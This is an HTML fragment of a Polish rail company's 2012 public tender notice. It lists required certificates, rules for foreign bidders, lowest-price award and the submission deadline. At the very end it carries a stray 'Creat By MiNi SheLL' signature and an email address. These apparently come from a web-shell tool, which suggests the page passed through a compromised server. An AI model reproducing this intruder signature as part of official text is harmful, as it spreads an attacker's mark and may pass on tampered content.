<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pkp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 10:30, miejsce: Polskie Koleje Państwowe Spółka Akcyjna 
Oddział Gospodarowania Nieruchomościami we Wrocławiu, 
ul. Joannitów 13, pokój Nr 305
50-525 Wrocław
Polska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com